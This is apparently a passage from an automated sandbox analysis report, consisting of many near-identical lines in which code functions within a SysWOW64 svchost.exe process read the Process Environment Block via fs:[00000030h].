                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]2_2_032451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]2_2_032451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]2_2_032451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032451C0 mov eax, dword ptr fs:[00000030h]2_2_032451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D02D mov eax, dword ptr fs:[00000030h]2_2_0322D02D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03255004 mov eax, dword ptr fs:[00000030h]2_2_03255004
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03255004 mov ecx, dword ptr fs:[00000030h]2_2_03255004
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238009 mov eax, dword ptr fs:[00000030h]2_2_03238009
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272010 mov ecx, dword ptr fs:[00000030h]2_2_03272010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D9060 mov eax, dword ptr fs:[00000030h]2_2_032D9060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237072 mov eax, dword ptr fs:[00000030h]2_2_03237072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236074 mov eax, dword ptr fs:[00000030h]2_2_03236074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236074 mov eax, dword ptr fs:[00000030h]2_2_03236074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260044 mov eax, dword ptr fs:[00000030h]2_2_03260044
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330505B mov eax, dword ptr fs:[00000030h]2_2_0330505B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6040 mov eax, dword ptr fs:[00000030h]2_2_032B6040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231051 mov eax, dword ptr fs:[00000030h]2_2_03231051
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231051 mov eax, dword ptr fs:[00000030h]2_2_03231051
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EB0AF mov eax, dword ptr fs:[00000030h]2_2_032EB0AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032700A5 mov eax, dword ptr fs:[00000030h]2_2_032700A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033050B7 mov eax, dword ptr fs:[00000030h]2_2_033050B7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DF0A5 mov eax, dword ptr fs:[00000030h]2_2_032DF0A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60A0 mov eax, dword ptr fs:[00000030h]2_2_032B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304080 mov eax, dword ptr fs:[00000030h]2_2_03304080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A093 mov ecx, dword ptr fs:[00000030h]2_2_0322A093
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C090 mov eax, dword ptr fs:[00000030h]2_2_0322C090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B7090 mov eax, dword ptr fs:[00000030h]2_2_032B7090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6090 mov eax, dword ptr fs:[00000030h]2_2_032C6090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC0E0 mov ecx, dword ptr fs:[00000030h]2_2_032BC0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F6 mov eax, dword ptr fs:[00000030h]2_2_0322C0F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D0F0 mov eax, dword ptr fs:[00000030h]2_2_0326D0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D0F0 mov ecx, dword ptr fs:[00000030h]2_2_0326D0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]2_2_032290F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]2_2_032290F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]2_2_032290F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032290F8 mov eax, dword ptr fs:[00000030h]2_2_032290F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B0D0 mov eax, dword ptr fs:[00000030h]2_2_0324B0D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]2_2_0322B0D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]2_2_0322B0D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]2_2_0322B0D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B0D6 mov eax, dword ptr fs:[00000030h]2_2_0322B0D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03259723 mov eax, dword ptr fs:[00000030h]2_2_03259723
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323D700 mov ecx, dword ptr fs:[00000030h]2_2_0323D700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F970B mov eax, dword ptr fs:[00000030h]2_2_032F970B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F970B mov eax, dword ptr fs:[00000030h]2_2_032F970B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]2_2_0322B705
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]2_2_0322B705
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]2_2_0322B705
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B705 mov eax, dword ptr fs:[00000030h]2_2_0322B705
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]2_2_0325270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]2_2_0325270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325270D mov eax, dword ptr fs:[00000030h]2_2_0325270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323471B mov eax, dword ptr fs:[00000030h]2_2_0323471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323471B mov eax, dword ptr fs:[00000030h]2_2_0323471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF717 mov eax, dword ptr fs:[00000030h]2_2_032EF717
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03242760 mov ecx, dword ptr fs:[00000030h]2_2_03242760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271763 mov eax, dword ptr fs:[00000030h]2_2_03271763
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260774 mov eax, dword ptr fs:[00000030h]2_2_03260774
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234779 mov eax, dword ptr fs:[00000030h]2_2_03234779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234779 mov eax, dword ptr fs:[00000030h]2_2_03234779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B174B mov eax, dword ptr fs:[00000030h]2_2_032B174B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B174B mov ecx, dword ptr fs:[00000030h]2_2_032B174B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03263740 mov eax, dword ptr fs:[00000030h]2_2_03263740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326174A mov eax, dword ptr fs:[00000030h]2_2_0326174A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov ecx, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252755 mov eax, dword ptr fs:[00000030h]2_2_03252755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A750 mov eax, dword ptr fs:[00000030h]2_2_0326A750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F75B mov eax, dword ptr fs:[00000030h]2_2_0322F75B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE750 mov eax, dword ptr fs:[00000030h]2_2_032DE750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307A7 mov eax, dword ptr fs:[00000030h]2_2_032307A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]2_2_032FD7A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]2_2_032FD7A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FD7A7 mov eax, dword ptr fs:[00000030h]2_2_032FD7A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033017BC mov eax, dword ptr fs:[00000030h]2_2_033017BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03261796 mov eax, dword ptr fs:[00000030h]2_2_03261796
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03261796 mov eax, dword ptr fs:[00000030h]2_2_03261796
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B781 mov eax, dword ptr fs:[00000030h]2_2_0330B781
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B781 mov eax, dword ptr fs:[00000030h]2_2_0330B781
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE79D mov eax, dword ptr fs:[00000030h]2_2_032AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E7E0 mov eax, dword ptr fs:[00000030h]2_2_0325E7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]2_2_032337E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032377F9 mov eax, dword ptr fs:[00000030h]2_2_032377F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032377F9 mov eax, dword ptr fs:[00000030h]2_2_032377F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF7CF mov eax, dword ptr fs:[00000030h]2_2_032EF7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237623 mov eax, dword ptr fs:[00000030h]2_2_03237623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD62C mov ecx, dword ptr fs:[00000030h]2_2_032DD62C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD62C mov ecx, dword ptr fs:[00000030h]2_2_032DD62C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD62C mov eax, dword ptr fs:[00000030h]2_2_032DD62C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235622 mov eax, dword ptr fs:[00000030h]2_2_03235622
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03235622 mov eax, dword ptr fs:[00000030h]2_2_03235622
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C620 mov eax, dword ptr fs:[00000030h]2_2_0326C620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230630 mov eax, dword ptr fs:[00000030h]2_2_03230630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260630 mov eax, dword ptr fs:[00000030h]2_2_03260630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8633 mov esi, dword ptr fs:[00000030h]2_2_032B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8633 mov eax, dword ptr fs:[00000030h]2_2_032B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8633 mov eax, dword ptr fs:[00000030h]2_2_032B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F63F mov eax, dword ptr fs:[00000030h]2_2_0326F63F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326F63F mov eax, dword ptr fs:[00000030h]2_2_0326F63F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]2_2_032C3608
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D600 mov eax, dword ptr fs:[00000030h]2_2_0325D600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D600 mov eax, dword ptr fs:[00000030h]2_2_0325D600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9603 mov eax, dword ptr fs:[00000030h]2_2_032B9603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF607 mov eax, dword ptr fs:[00000030h]2_2_032EF607
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326360F mov eax, dword ptr fs:[00000030h]2_2_0326360F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304600 mov eax, dword ptr fs:[00000030h]2_2_03304600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]2_2_03227662
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]2_2_03227662
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]2_2_03227662
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]2_2_03243660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]2_2_03243660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]2_2_03243660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]2_2_032B166E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]2_2_032B166E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]2_2_032B166E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326666D mov esi, dword ptr fs:[00000030h]2_2_0326666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326666D mov eax, dword ptr fs:[00000030h]2_2_0326666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326666D mov eax, dword ptr fs:[00000030h]2_2_0326666D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE660 mov eax, dword ptr fs:[00000030h]2_2_032BE660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C5660 mov eax, dword ptr fs:[00000030h]2_2_032C5660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230670 mov eax, dword ptr fs:[00000030h]2_2_03230670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272670 mov eax, dword ptr fs:[00000030h]2_2_03272670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272670 mov eax, dword ptr fs:[00000030h]2_2_03272670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03233640 mov eax, dword ptr fs:[00000030h]2_2_03233640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]2_2_0324F640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]2_2_0324F640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]2_2_0324F640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C640 mov eax, dword ptr fs:[00000030h]2_2_0326C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C640 mov eax, dword ptr fs:[00000030h]2_2_0326C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D64A mov eax, dword ptr fs:[00000030h]2_2_0322D64A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D64A mov eax, dword ptr fs:[00000030h]2_2_0322D64A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03265654 mov eax, dword ptr fs:[00000030h]2_2_03265654
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323965A mov eax, dword ptr fs:[00000030h]2_2_0323965A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323965A mov eax, dword ptr fs:[00000030h]2_2_0323965A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326265C mov eax, dword ptr fs:[00000030h]2_2_0326265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326265C mov ecx, dword ptr fs:[00000030h]2_2_0326265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326265C mov eax, dword ptr fs:[00000030h]2_2_0326265C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F86A8 mov eax, dword ptr fs:[00000030h]2_2_032F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F86A8 mov eax, dword ptr fs:[00000030h]2_2_032F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF68C mov eax, dword ptr fs:[00000030h]2_2_032EF68C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]2_2_03240680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238690 mov eax, dword ptr fs:[00000030h]2_2_03238690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD69D mov eax, dword ptr fs:[00000030h]2_2_032AD69D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC691 mov eax, dword ptr fs:[00000030h]2_2_032BC691
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032296E0 mov eax, dword ptr fs:[00000030h]2_2_032296E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032296E0 mov eax, dword ptr fs:[00000030h]2_2_032296E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C6E0 mov eax, dword ptr fs:[00000030h]2_2_0323C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]2_2_032356E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]2_2_032356E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]2_2_032356E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032566E0 mov eax, dword ptr fs:[00000030h]2_2_032566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032566E0 mov eax, dword ptr fs:[00000030h]2_2_032566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C56E0 mov eax, dword ptr fs:[00000030h]2_2_032C56E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C56E0 mov eax, dword ptr fs:[00000030h]2_2_032C56E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC6F2 mov eax, dword ptr fs:[00000030h]2_2_032AC6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC6F2 mov eax, dword ptr fs:[00000030h]2_2_032AC6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032306CF mov eax, dword ptr fs:[00000030h]2_2_032306CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA6C0 mov eax, dword ptr fs:[00000030h]2_2_032FA6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D86C2 mov eax, dword ptr fs:[00000030h]2_2_032D86C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325D6D0 mov eax, dword ptr fs:[00000030h]2_2_0325D6D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C66D0 mov eax, dword ptr fs:[00000030h]2_2_032C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C66D0 mov eax, dword ptr fs:[00000030h]2_2_032C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03261527 mov eax, dword ptr fs:[00000030h]2_2_03261527
